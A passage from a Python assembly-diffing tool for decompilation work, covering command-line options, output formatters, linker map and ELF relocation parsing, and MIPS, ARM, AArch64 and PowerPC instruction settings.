)
parser.add_argument(
"-V",
"--compress-sameinstr",
metavar="N",
dest="compress_sameinstr",
type=int,
help="""Compress streaks of lines with same instructions (but possibly
different regalloc), leaving N lines of context around other parts.""",
)
# Project-specific flags, e.g. different versions/make arguments.
add_custom_arguments_fn = getattr(diff_settings, "add_custom_arguments", None)
if add_custom_arguments_fn:
add_custom_arguments_fn(parser)
if argcomplete:
argcomplete.autocomplete(parser)
# ==== IMPORTS ====
# (We do imports late to optimize auto-complete performance.)
import abc
import ast
from collections import Counter, defaultdict
from dataclasses import asdict, dataclass, field, replace
import difflib
import enum
import html
import itertools
import json
import os
import queue
import re
import string
import struct
import subprocess
import threading
import time
import traceback
MISSING_PREREQUISITES = (
"Missing prerequisite python module {}. "
"Run `python3 -m pip install --user colorama watchdog python-Levenshtein cxxfilt` to install prerequisites (cxxfilt only needed with --source)."
)
try:
from colorama import Back, Fore, Style
import watchdog
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
# ==== CONFIG ====
@dataclass
class ProjectSettings:
arch_str: str
objdump_executable: str
build_command: List[str]
map_format: str
mw_build_dir: str
baseimg: Optional[str]
myimg: Optional[str]
mapfile: Optional[str]
source_directories: Optional[List[str]]
source_extensions: List[str]
show_line_numbers_default: bool
@dataclass
class Compress:
context: int
same_instr: bool
@dataclass
class Config:
arch: "ArchSettings"
# Build/objdump options
diff_obj: bool
make: bool
source_old_binutils: bool
inlines: bool
max_function_size_lines: int
max_function_size_bytes: int
# Display options
formatter: "Formatter"
threeway: Optional[str]
base_shift: int
skip_lines: int
compress: Optional[Compress]
show_branches: bool
show_line_numbers: bool
show_source: bool
stop_jrra: bool
ignore_large_imms: bool
ignore_addr_diffs: bool
algorithm: str
# Score options
score_stack_differences = True
penalty_stackdiff = 1
penalty_regalloc = 5
penalty_reordering = 60
penalty_insertion = 100
penalty_deletion = 100
def create_project_settings(settings: Dict[str, Any]) -> ProjectSettings:
return ProjectSettings(
arch_str=settings.get("arch", "mips"),
baseimg=settings.get("baseimg"),
myimg=settings.get("myimg"),
mapfile=settings.get("mapfile"),
build_command=settings.get(
"make_command", ["make", *settings.get("makeflags", [])]
),
source_directories=settings.get("source_directories"),
source_extensions=settings.get(
"source_extensions", [".c", ".h", ".cpp", ".hpp", ".s"]
),
objdump_executable=get_objdump_executable(settings.get("objdump_executable")),
map_format=settings.get("map_format", "gnu"),
mw_build_dir=settings.get("mw_build_dir", "build/"),
show_line_numbers_default=settings.get("show_line_numbers_default", True),
)
def create_config(args: argparse.Namespace, project: ProjectSettings) -> Config:
arch = get_arch(project.arch_str)
formatter: Formatter
if args.format == "plain":
formatter = PlainFormatter(column_width=args.column_width)
elif args.format == "color":
formatter = AnsiFormatter(column_width=args.column_width)
elif args.format == "html":
formatter = HtmlFormatter()
elif args.format == "json":
formatter = JsonFormatter(arch_str=arch.name)
else:
raise ValueError(f"Unsupported --format: {args.format}")
compress = None
if args.compress_matching is not None:
compress = Compress(args.compress_matching, False)
if args.compress_sameinstr is not None:
if compress is not None:
raise ValueError(
"Cannot pass both --compress-matching and --compress-sameinstr"
)
compress = Compress(args.compress_sameinstr, True)
show_line_numbers = args.show_line_numbers
if show_line_numbers is None:
show_line_numbers = project.show_line_numbers_default
return Config(
arch=arch,
# Build/objdump options
diff_obj=args.diff_obj,
make=args.make,
source_old_binutils=args.source_old_binutils,
inlines=args.inlines,
max_function_size_lines=args.max_lines,
max_function_size_bytes=args.max_lines * 4,
# Display options
formatter=formatter,
threeway=args.threeway,
base_shift=eval_int(
args.base_shift, "Failed to parse --base-shift (-S) argument as an integer."
),
skip_lines=args.skip_lines,
compress=compress,
show_branches=args.show_branches,
show_line_numbers=show_line_numbers,
show_source=args.show_source or args.source_old_binutils,
stop_jrra=args.stop_jrra,
ignore_large_imms=args.ignore_large_imms,
ignore_addr_diffs=args.ignore_addr_diffs,
algorithm=args.algorithm,
)
def get_objdump_executable(objdump_executable: Optional[str]) -> str:
if objdump_executable is not None:
return objdump_executable
objdump_candidates = [
"mips-linux-gnu-objdump",
"mips64-elf-objdump",
"mips-elf-objdump",
]
for objdump_cand in objdump_candidates:
try:
subprocess.check_call(
[objdump_cand, "--version"],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
return objdump_cand
except subprocess.CalledProcessError:
pass
except FileNotFoundError:
pass
return fail(
f"Missing binutils; please ensure {' or '.join(objdump_candidates)} exists, or configure objdump_executable."
)
def get_arch(arch_str: str) -> "ArchSettings":
for settings in ARCH_SETTINGS:
if arch_str == settings.name:
return settings
raise ValueError(f"Unknown architecture: {arch_str}")
BUFFER_CMD: List[str] = ["tail", "-c", str(10 ** 9)]
# -S truncates long lines instead of wrapping them
# -R interprets color escape sequences
# -i ignores case when searching
# -c something about how the screen gets redrawn; I don't remember the purpose
# -#6 makes left/right arrow keys scroll by 6 characters
LESS_CMD: List[str] = ["less", "-SRic", "-#6"]
DEBOUNCE_DELAY: float = 0.1
# ==== FORMATTING ====
@enum.unique
class BasicFormat(enum.Enum):
NONE = enum.auto()
IMMEDIATE = enum.auto()
STACK = enum.auto()
REGISTER = enum.auto()
DELAY_SLOT = enum.auto()
DIFF_CHANGE = enum.auto()
DIFF_ADD = enum.auto()
DIFF_REMOVE = enum.auto()
SOURCE_FILENAME = enum.auto()
SOURCE_FUNCTION = enum.auto()
SOURCE_LINE_NUM = enum.auto()
SOURCE_OTHER = enum.auto()
@dataclass(frozen=True)
class RotationFormat:
group: str
index: int
key: str
Format = Union[BasicFormat, RotationFormat]
FormatFunction = Callable[[str], Format]
class Text:
segments: List[Tuple[str, Format]]
def __init__(self, line: str = "", f: Format = BasicFormat.NONE) -> None:
self.segments = [(line, f)] if line else []
def reformat(self, f: Format) -> "Text":
return Text(self.plain(), f)
def plain(self) -> str:
return "".join(s for s, f in self.segments)
def __repr__(self) -> str:
return f"<Text: {self.plain()!r}>"
def __bool__(self) -> bool:
return any(s for s, f in self.segments)
def __str__(self) -> str:
# Use Formatter.apply(...) instead
return NotImplemented
def __eq__(self, other: object) -> bool:
return NotImplemented
def __add__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
result = Text()
# If two adjacent segments have the same format, merge their lines
if (
self.segments
and other.segments
and self.segments[-1][1] == other.segments[0][1]
):
result.segments = (
self.segments[:-1]
+ [(self.segments[-1][0] + other.segments[0][0], self.segments[-1][1])]
+ other.segments[1:]
)
else:
result.segments = self.segments + other.segments
return result
def __radd__(self, other: Union["Text", str]) -> "Text":
if isinstance(other, str):
other = Text(other)
return other + self
def finditer(self, pat: Pattern[str]) -> Iterator[Match[str]]:
"""Replacement for `pat.finditer(text)` that operates on the inner text,
and returns the exact same matches as `Text.sub(pat, ...)`."""
for chunk, f in self.segments:
for match in pat.finditer(chunk):
yield match
def sub(self, pat: Pattern[str], sub_fn: Callable[[Match[str]], "Text"]) -> "Text":
result = Text()
for chunk, f in self.segments:
i = 0
for match in pat.finditer(chunk):
start, end = match.start(), match.end()
assert i <= start <= end <= len(chunk)
sub = sub_fn(match)
if i != start:
result.segments.append((chunk[i:start], f))
result.segments.extend(sub.segments)
i = end
if chunk[i:]:
result.segments.append((chunk[i:], f))
return result
def ljust(self, column_width: int) -> "Text":
length = sum(len(x) for x, _ in self.segments)
return self + " " * max(column_width - length, 0)
@dataclass
class TableMetadata:
headers: Tuple[Text, ...]
current_score: int
max_score: int
previous_score: Optional[int]
class Formatter(abc.ABC):
@abc.abstractmethod
def apply_format(self, chunk: str, f: Format) -> str:
"""Apply the formatting `f` to `chunk` and escape the contents."""
...
@abc.abstractmethod
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
"""Format a multi-column table with metadata"""
...
def apply(self, text: Text) -> str:
return "".join(self.apply_format(chunk, f) for chunk, f in text.segments)
@staticmethod
def outputline_texts(lines: Tuple["OutputLine", ...]) -> Tuple[Text, ...]:
return tuple([lines[0].base or Text()] + [line.fmt2 for line in lines[1:]])
@dataclass
class PlainFormatter(Formatter):
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
return chunk
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [meta.headers] + [self.outputline_texts(ls) for ls in lines]
return "\n".join(
"".join(self.apply(x.ljust(self.column_width)) for x in row) for row in rows
)
@dataclass
class AnsiFormatter(Formatter):
# Additional ansi escape codes not in colorama. See:
# https://en.wikipedia.org/wiki/ANSI_escape_code#SGR_(Select_Graphic_Rendition)_parameters
STYLE_UNDERLINE = "\x1b[4m"
STYLE_NO_UNDERLINE = "\x1b[24m"
STYLE_INVERT = "\x1b[7m"
BASIC_ANSI_CODES = {
BasicFormat.NONE: "",
BasicFormat.IMMEDIATE: Fore.LIGHTBLUE_EX,
BasicFormat.STACK: Fore.YELLOW,
BasicFormat.REGISTER: Fore.YELLOW,
BasicFormat.DELAY_SLOT: Fore.LIGHTBLACK_EX,
BasicFormat.DIFF_CHANGE: Fore.LIGHTBLUE_EX,
BasicFormat.DIFF_ADD: Fore.GREEN,
BasicFormat.DIFF_REMOVE: Fore.RED,
BasicFormat.SOURCE_FILENAME: Style.DIM + Style.BRIGHT,
BasicFormat.SOURCE_FUNCTION: Style.DIM + Style.BRIGHT + STYLE_UNDERLINE,
BasicFormat.SOURCE_LINE_NUM: Fore.LIGHTBLACK_EX,
BasicFormat.SOURCE_OTHER: Style.DIM,
}
BASIC_ANSI_CODES_UNDO = {
BasicFormat.NONE: "",
BasicFormat.SOURCE_FILENAME: Style.NORMAL,
BasicFormat.SOURCE_FUNCTION: Style.NORMAL + STYLE_NO_UNDERLINE,
BasicFormat.SOURCE_OTHER: Style.NORMAL,
}
ROTATION_ANSI_COLORS = [
Fore.MAGENTA,
Fore.CYAN,
Fore.GREEN,
Fore.RED,
Fore.LIGHTYELLOW_EX,
Fore.LIGHTMAGENTA_EX,
Fore.LIGHTCYAN_EX,
Fore.LIGHTGREEN_EX,
Fore.LIGHTBLACK_EX,
]
column_width: int
def apply_format(self, chunk: str, f: Format) -> str:
if f == BasicFormat.NONE:
return chunk
undo_ansi_code = Fore.RESET
if isinstance(f, BasicFormat):
ansi_code = self.BASIC_ANSI_CODES[f]
undo_ansi_code = self.BASIC_ANSI_CODES_UNDO.get(f, undo_ansi_code)
elif isinstance(f, RotationFormat):
ansi_code = self.ROTATION_ANSI_COLORS[
f.index % len(self.ROTATION_ANSI_COLORS)
]
else:
static_assert_unreachable(f)
return f"{ansi_code}{chunk}{undo_ansi_code}"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
rows = [(meta.headers, False)] + [
(self.outputline_texts(line), line[1].is_data_ref) for line in lines
]
return "\n".join(
"".join(
(self.STYLE_INVERT if is_data_ref else "")
+ self.apply(x.ljust(self.column_width))
for x in row
)
for (row, is_data_ref) in rows
)
@dataclass
class HtmlFormatter(Formatter):
rotation_formats: int = 9
def apply_format(self, chunk: str, f: Format) -> str:
chunk = html.escape(chunk)
if f == BasicFormat.NONE:
return chunk
if isinstance(f, BasicFormat):
class_name = f.name.lower().replace("_", "-")
data_attr = ""
elif isinstance(f, RotationFormat):
class_name = f"rotation-{f.index % self.rotation_formats}"
rotation_key = html.escape(f"{f.group};{f.key}", quote=True)
data_attr = f'data-rotation="{rotation_key}"'
else:
static_assert_unreachable(f)
return f"<span class='{class_name}' {data_attr}>{chunk}</span>"
def table(self, meta: TableMetadata, lines: List[Tuple["OutputLine", ...]]) -> str:
def table_row(line: Tuple[Text, ...], is_data_ref: bool, cell_el: str) -> str:
tr_attrs = " class='data-ref'" if is_data_ref else ""
output_row = f" <tr{tr_attrs}>"
for cell in line:
cell_html = self.apply(cell)
output_row += f"<{cell_el}>{cell_html}</{cell_el}>"
output_row += "</tr>\n"
return output_row
output = "<table class='diff'>\n"
output += " <thead>\n"
output += table_row(meta.headers, False, "th")
output += " </thead>\n"
output += " <tbody>\n"
output += "".join(
table_row(self.outputline_texts(line), line[1].is_data_ref, "td")
for line in lines
)
output += " </tbody>\n"
output += "</table>\n"
return output
@dataclass
class JsonFormatter(Formatter):
arch_str: str
def apply_format(self, chunk: str, f: Format) -> str:
# This method is unused by this formatter
return NotImplemented
def table(self, meta: TableMetadata, rows: List[Tuple["OutputLine", ...]]) -> str:
def serialize_format(s: str, f: Format) -> Dict[str, Any]:
if f == BasicFormat.NONE:
return {"text": s}
elif isinstance(f, BasicFormat):
return {"text": s, "format": f.name.lower()}
elif isinstance(f, RotationFormat):
attrs = asdict(f)
attrs.update(
{
"text": s,
"format": "rotation",
}
)
return attrs
else:
static_assert_unreachable(f)
def serialize(text: Optional[Text]) -> List[Dict[str, Any]]:
if text is None:
return []
return [serialize_format(s, f) for s, f in text.segments]
is_threeway = len(meta.headers) == 3
output: Dict[str, Any] = {}
output["arch_str"] = self.arch_str
output["header"] = {
name: serialize(h)
for h, name in zip(meta.headers, ("base", "current", "previous"))
}
output["current_score"] = meta.current_score
output["max_score"] = meta.max_score
if meta.previous_score is not None:
output["previous_score"] = meta.previous_score
output_rows: List[Dict[str, Any]] = []
for row in rows:
output_row: Dict[str, Any] = {}
output_row["key"] = row[0].key2
output_row["is_data_ref"] = row[1].is_data_ref
iters = [
("base", row[0].base, row[0].line1),
("current", row[1].fmt2, row[1].line2),
]
if is_threeway:
iters.append(("previous", row[2].fmt2, row[2].line2))
if all(line is None for _, _, line in iters):
# Skip rows that were only for displaying source code
continue
for column_name, text, line in iters:
column: Dict[str, Any] = {}
column["text"] = serialize(text)
if line:
if line.line_num is not None:
column["line"] = line.line_num
if line.branch_target is not None:
column["branch"] = line.branch_target
if line.source_lines:
column["src"] = line.source_lines
if line.comment is not None:
column["src_comment"] = line.comment
if line.source_line_num is not None:
column["src_line"] = line.source_line_num
if line or column["text"]:
output_row[column_name] = column
output_rows.append(output_row)
output["rows"] = output_rows
return json.dumps(output)
def format_fields(
pat: Pattern[str],
out1: Text,
out2: Text,
color1: FormatFunction,
color2: Optional[FormatFunction] = None,
) -> Tuple[Text, Text]:
diffs = [
of.group() != nf.group()
for (of, nf) in zip(out1.finditer(pat), out2.finditer(pat))
]
it = iter(diffs)
def maybe_color(color: FormatFunction, s: str) -> Text:
return Text(s, color(s)) if next(it, False) else Text(s)
out1 = out1.sub(pat, lambda m: maybe_color(color1, m.group()))
it = iter(diffs)
out2 = out2.sub(pat, lambda m: maybe_color(color2 or color1, m.group()))
return out1, out2
def symbol_formatter(group: str, base_index: int) -> FormatFunction:
symbol_formats: Dict[str, Format] = {}
def symbol_format(s: str) -> Format:
# TODO: it would be nice to use a unique Format for each symbol, so we could
# add extra UI elements in the HTML version
f = symbol_formats.get(s)
if f is None:
index = len(symbol_formats) + base_index
f = RotationFormat(key=s, index=index, group=group)
symbol_formats[s] = f
return f
return symbol_format
# ==== LOGIC ====
ObjdumpCommand = Tuple[List[str], str, Optional[str]]
def maybe_eval_int(expr: str) -> Optional[int]:
try:
ret = ast.literal_eval(expr)
if not isinstance(ret, int):
raise Exception("not an integer")
return ret
except Exception:
return None
def eval_int(expr: str, emsg: str) -> int:
ret = maybe_eval_int(expr)
if ret is None:
fail(emsg)
return ret
def eval_line_num(expr: str) -> Optional[int]:
expr = expr.strip().replace(":", "")
if expr == "":
return None
return int(expr, 16)
def run_make(target: str, project: ProjectSettings) -> None:
subprocess.check_call(project.build_command + [target])
def run_make_capture_output(
target: str, project: ProjectSettings
) -> "subprocess.CompletedProcess[bytes]":
return subprocess.run(
project.build_command + [target],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
def restrict_to_function(dump: str, fn_name: str) -> str:
try:
ind = dump.index("\n", dump.index(f"<{fn_name}>:"))
return dump[ind + 1 :]
except ValueError:
return ""
def serialize_data_references(references: List[Tuple[int, int, str]]) -> str:
return "".join(
f"DATAREF {text_offset} {from_offset} {from_section}\n"
for (text_offset, from_offset, from_section) in references
)
def maybe_get_objdump_source_flags(config: Config) -> List[str]:
flags = []
if config.show_line_numbers or config.show_source:
flags.append("--line-numbers")
if config.show_source:
flags.append("--source")
if not config.source_old_binutils:
flags.append("--source-comment=│ ")
if config.inlines:
flags.append("--inlines")
return flags
def run_objdump(cmd: ObjdumpCommand, config: Config, project: ProjectSettings) -> str:
flags, target, restrict = cmd
try:
out = subprocess.run(
[project.objdump_executable] + config.arch.arch_flags + flags + [target],
check=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
).stdout
except subprocess.CalledProcessError as e:
print(e.stdout)
print(e.stderr)
if "unrecognized option '--source-comment" in e.stderr:
fail("** Try using --source-old-binutils instead of --source **")
raise e
obj_data: Optional[bytes] = None
if config.diff_obj:
with open(target, "rb") as f:
obj_data = f.read()
return preprocess_objdump_out(restrict, obj_data, out)
def preprocess_objdump_out(
restrict: Optional[str], obj_data: Optional[bytes], objdump_out: str
) -> str:
"""
Preprocess the output of objdump into a format that `process()` expects.
This format is suitable for saving to disk with `--write-asm`.
- Optionally filter the output to a single function (`restrict`)
- Otherwise, strip objdump header (7 lines)
- Prepend .data references ("DATAREF" lines) when working with object files
"""
out = objdump_out
if restrict is not None:
out = restrict_to_function(out, restrict)
else:
for i in range(7):
out = out[out.find("\n") + 1 :]
out = out.rstrip("\n")
if obj_data:
out = serialize_data_references(parse_elf_data_references(obj_data)) + out
return out
def search_map_file(
fn_name: str, project: ProjectSettings
) -> Tuple[Optional[str], Optional[int]]:
if not project.mapfile:
fail(f"No map file configured; cannot find function {fn_name}.")
try:
with open(project.mapfile) as f:
contents = f.read()
except Exception:
fail(f"Failed to open map file {project.mapfile} for reading.")
if project.map_format == "gnu":
lines = contents.split("\n")
try:
cur_objfile = None
ram_to_rom = None
cands = []
last_line = ""
for line in lines:
if line.startswith(" .text"):
cur_objfile = line.split()[3]
if "load address" in line:
tokens = last_line.split() + line.split()
ram = int(tokens[1], 0)
rom = int(tokens[5], 0)
ram_to_rom = rom - ram
if line.endswith(" " + fn_name):
ram = int(line.split()[0], 0)
if cur_objfile is not None and ram_to_rom is not None:
cands.append((cur_objfile, ram + ram_to_rom))
last_line = line
except Exception as e:
traceback.print_exc()
fail(f"Internal error while parsing map file")
if len(cands) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(cands) == 1:
return cands[0]
elif project.map_format == "mw":
find = re.findall(
re.compile(
# ram elf rom
r" \S+ \S+ (\S+) (\S+) . "
+ fn_name
# object name
+ r"(?: \(entry of \.(?:init|text)\))? \t(\S+)"
),
contents,
)
if len(find) > 1:
fail(f"Found multiple occurrences of function {fn_name} in map file.")
if len(find) == 1:
rom = int(find[0][1], 16)
objname = find[0][2]
# The metrowerks linker map format does not contain the full object path,
# so we must complete it manually.
objfiles = [
os.path.join(dirpath, f)
for dirpath, _, filenames in os.walk(project.mw_build_dir)
for f in filenames
if f == objname
]
if len(objfiles) > 1:
all_objects = "\n".join(objfiles)
fail(
f"Found multiple objects of the same name {objname} in {project.mw_build_dir}, "
f"cannot determine which to diff against: \n{all_objects}"
)
if len(objfiles) == 1:
objfile = objfiles[0]
# TODO Currently the ram-rom conversion only works for diffing ELF
# executables, but it would likely be more convenient to diff DOLs.
# At this time it is recommended to always use -o when running the diff
# script as this mode does not make use of the ram-rom conversion.
return objfile, rom
else:
fail(f"Linker map format {project.map_format} unrecognised.")
return None, None
def parse_elf_data_references(data: bytes) -> List[Tuple[int, int, str]]:
e_ident = data[:16]
if e_ident[:4] != b"\x7FELF":
return []
SHT_SYMTAB = 2
SHT_REL = 9
SHT_RELA = 4
is_32bit = e_ident[4] == 1
is_little_endian = e_ident[5] == 1
str_end = "<" if is_little_endian else ">"
str_off = "I" if is_32bit else "Q"
sym_size = {"B": 1, "H": 2, "I": 4, "Q": 8}
def read(spec: str, offset: int) -> Tuple[int, ...]:
spec = spec.replace("P", str_off)
size = struct.calcsize(spec)
return struct.unpack(str_end + spec, data[offset : offset + size])
(
e_type,
e_machine,
e_version,
e_entry,
e_phoff,
e_shoff,
e_flags,
e_ehsize,
e_phentsize,
e_phnum,
e_shentsize,
e_shnum,
e_shstrndx,
) = read("HHIPPPIHHHHHH", 16)
if e_type != 1: # relocatable
return []
assert e_shoff != 0
assert e_shnum != 0 # don't support > 0xFF00 sections
assert e_shstrndx != 0
@dataclass
class Section:
sh_name: int
sh_type: int
sh_flags: int
sh_addr: int
sh_offset: int
sh_size: int
sh_link: int
sh_info: int
sh_addralign: int
sh_entsize: int
sections = [
Section(*read("IIPPPPIIPP", e_shoff + i * e_shentsize)) for i in range(e_shnum)
]
shstr = sections[e_shstrndx]
sec_name_offs = [shstr.sh_offset + s.sh_name for s in sections]
sec_names = [data[offset : data.index(b"\0", offset)] for offset in sec_name_offs]
symtab_sections = [i for i in range(e_shnum) if sections[i].sh_type == SHT_SYMTAB]
assert len(symtab_sections) == 1
symtab = sections[symtab_sections[0]]
text_sections = [i for i in range(e_shnum) if sec_names[i] == b".text"]
assert len(text_sections) == 1
text_section = text_sections[0]
ret: List[Tuple[int, int, str]] = []
for s in sections:
if s.sh_type == SHT_REL or s.sh_type == SHT_RELA:
if s.sh_info == text_section:
# Skip .text -> .text references
continue
sec_name = sec_names[s.sh_info].decode("latin1")
sec_base = sections[s.sh_info].sh_offset
for i in range(0, s.sh_size, s.sh_entsize):
if s.sh_type == SHT_REL:
r_offset, r_info = read("PP", s.sh_offset + i)
else:
r_offset, r_info, r_addend = read("PPP", s.sh_offset + i)
if is_32bit:
r_sym = r_info >> 8
r_type = r_info & 0xFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_value, st_size, st_info, st_other, st_shndx = read(
"IIIBBH", sym_offset
)
else:
r_sym = r_info >> 32
r_type = r_info & 0xFFFFFFFF
sym_offset = symtab.sh_offset + symtab.sh_entsize * r_sym
st_name, st_info, st_other, st_shndx, st_value, st_size = read(
"IBBHQQ", sym_offset
)
if st_shndx == text_section:
if s.sh_type == SHT_REL:
if e_machine == 8 and r_type == 2: # R_MIPS_32
(r_addend,) = read("I", sec_base + r_offset)
else:
continue
text_offset = (st_value + r_addend) & 0xFFFFFFFF
ret.append((text_offset, r_offset, sec_name))
return ret
def dump_elf(
start: str,
end: Optional[str],
diff_elf_symbol: str,
config: Config,
project: ProjectSettings,
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.base_shift:
fail("--base-shift not compatible with -e")
start_addr = eval_int(start, "Start address must be an integer expression.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
flags1 = [
f"--start-address={start_addr}",
f"--stop-address={end_addr}",
]
flags2 = [
f"--disassemble={diff_elf_symbol}",
]
objdump_flags = ["-drz", "-j", ".text"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(
objdump_flags + flags2 + maybe_get_objdump_source_flags(config),
project.myimg,
None,
),
)
def dump_objfile(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if config.base_shift:
fail("--base-shift not compatible with -o")
if end is not None:
fail("end address not supported together with -o")
if start.startswith("0"):
fail("numerical start address not supported with -o; pass a function name")
objfile, _ = search_map_file(start, project)
if not objfile:
fail("Not able to find .o file for function.")
if config.make:
run_make(objfile, project)
if not os.path.isfile(objfile):
fail(f"Not able to find .o file for function: {objfile} is not a file.")
refobjfile = "expected/" + objfile
if not os.path.isfile(refobjfile):
fail(f'Please ensure an OK .o file exists at "{refobjfile}".')
objdump_flags = ["-drz", "-j", ".text"]
return (
objfile,
(objdump_flags, refobjfile, start),
(objdump_flags + maybe_get_objdump_source_flags(config), objfile, start),
)
def dump_binary(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.make:
run_make(project.myimg, project)
start_addr = maybe_eval_int(start)
if start_addr is None:
_, start_addr = search_map_file(start, project)
if start_addr is None:
fail("Not able to find function in map file.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
objdump_flags = ["-Dz", "-bbinary"] + ["-EB" if config.arch.big_endian else "-EL"]
flags1 = [
f"--start-address={start_addr + config.base_shift}",
f"--stop-address={end_addr + config.base_shift}",
]
flags2 = [f"--start-address={start_addr}", f"--stop-address={end_addr}"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(objdump_flags + flags2, project.myimg, None),
)
class DifferenceNormalizer:
def __init__(self, config: Config) -> None:
self.config = config
def normalize(self, mnemonic: str, row: str) -> str:
"""This should be called exactly once for each line."""
arch = self.config.arch
row = self._normalize_arch_specific(mnemonic, row)
if self.config.ignore_large_imms and mnemonic not in arch.branch_instructions:
row = re.sub(self.config.arch.re_large_imm, "<imm>", row)
return row
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
return row
class DifferenceNormalizerAArch64(DifferenceNormalizer):
def __init__(self, config: Config) -> None:
super().__init__(config)
self._adrp_pair_registers: Set[str] = set()
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_adrp_differences(mnemonic, row)
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
return row + "<ignore>"
def _normalize_adrp_differences(self, mnemonic: str, row: str) -> str:
"""Identifies ADRP + LDR/ADD pairs that are used to access the GOT and
suppresses any immediate differences.
Whenever an ADRP is seen, the destination register is added to the set of registers
that are part of an ADRP + LDR/ADD pair. Registers are removed from the set as soon
as they are used for an LDR or ADD instruction which completes the pair.
This method is somewhat crude but should manage to detect most such pairs.
"""
row_parts = row.split("\t", 1)
if mnemonic == "adrp":
self._adrp_pair_registers.add(row_parts[1].strip().split(",")[0])
row, _ = split_off_address(row)
return row + "<ignore>"
elif mnemonic == "ldr":
for reg in self._adrp_pair_registers:
# ldr xxx, [reg]
# ldr xxx, [reg, <imm>]
if f", [{reg}" in row_parts[1]:
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
elif mnemonic == "add":
for reg in self._adrp_pair_registers:
# add reg, reg, <imm>
if row_parts[1].startswith(f"{reg}, {reg}, "):
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
return row
class DifferenceNormalizerARM32(DifferenceNormalizer):
def __init__(self, config: Config) -> None:
super().__init__(config)
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_address(row)
return row + "<ignore>"
@dataclass
class ArchSettings:
name: str
re_int: Pattern[str]
re_comment: Pattern[str]
re_reg: Pattern[str]
re_sprel: Pattern[str]
re_large_imm: Pattern[str]
re_imm: Pattern[str]
branch_instructions: Set[str]
instructions_with_address_immediates: Set[str]
forbidden: Set[str] = field(default_factory=lambda: set(string.ascii_letters + "_"))
arch_flags: List[str] = field(default_factory=list)
branch_likely_instructions: Set[str] = field(default_factory=set)
difference_normalizer: Type[DifferenceNormalizer] = DifferenceNormalizer
big_endian: Optional[bool] = True
delay_slot_instructions: Set[str] = field(default_factory=set)
MIPS_BRANCH_LIKELY_INSTRUCTIONS = {
"beql",
"bnel",
"beqzl",
"bnezl",
"bgezl",
"bgtzl",
"blezl",
"bltzl",
"bc1tl",
"bc1fl",
}
MIPS_BRANCH_INSTRUCTIONS = MIPS_BRANCH_LIKELY_INSTRUCTIONS.union(
{
"b",
"beq",
"bne",
"beqz",
"bnez",
"bgez",
"bgtz",
"blez",
"bltz",
"bc1t",
"bc1f",
}
)
ARM32_PREFIXES = {"b", "bl"}
ARM32_CONDS = {
"",
"eq",
"ne",
"cs",
"cc",
"mi",
"pl",
"vs",
"vc",
"hi",
"ls",
"ge",
"lt",
"gt",
"le",
"al",
}
ARM32_SUFFIXES = {"", ".n", ".w"}
ARM32_BRANCH_INSTRUCTIONS = {
f"{prefix}{cond}{suffix}"
for prefix in ARM32_PREFIXES
for cond in ARM32_CONDS
for suffix in ARM32_SUFFIXES
}
AARCH64_BRANCH_INSTRUCTIONS = {
"b",
"b.eq",
"b.ne",
"b.cs",
"b.hs",
"b.cc",
"b.lo",
"b.mi",
"b.pl",
"b.vs",
"b.vc",
"b.hi",
"b.ls",
"b.ge",
"b.lt",
"b.gt",
"b.le",
"cbz",
"cbnz",
"tbz",
"tbnz",
}
PPC_BRANCH_INSTRUCTIONS = {
"b",
"beq",
"beq+",
"beq-",
"bne",
"bne+",
"bne-",
"blt",
"blt+",
"blt-",
"ble",
"ble+",
"ble-",
"bdnz",
"bdnz+",
"bdnz-",
"bge",
"bge+",
"bge-",
"bgt",
"bgt+",
"bgt-",
}
MIPS_SETTINGS = ArchSettings(
name="mips",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"<.*?>"),
re_reg=re.compile(
r"\$?\b(a[0-7]|t[0-9]|s[0-8]|at|v[01]|f[12]?[0-9]|f3[01]|kt?[01]|fp|ra|zero)\b"
),
re_sprel=re.compile(r"(?<=,)([0-9]+|0x[0-9a-f]+)\(sp\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(sp)|%(lo|hi)\([^)]*\)"),
arch_flags=["-m", "mips:4300"],
branch_likely_instructions=MIPS_BRANCH_LIKELY_INSTRUCTIONS,
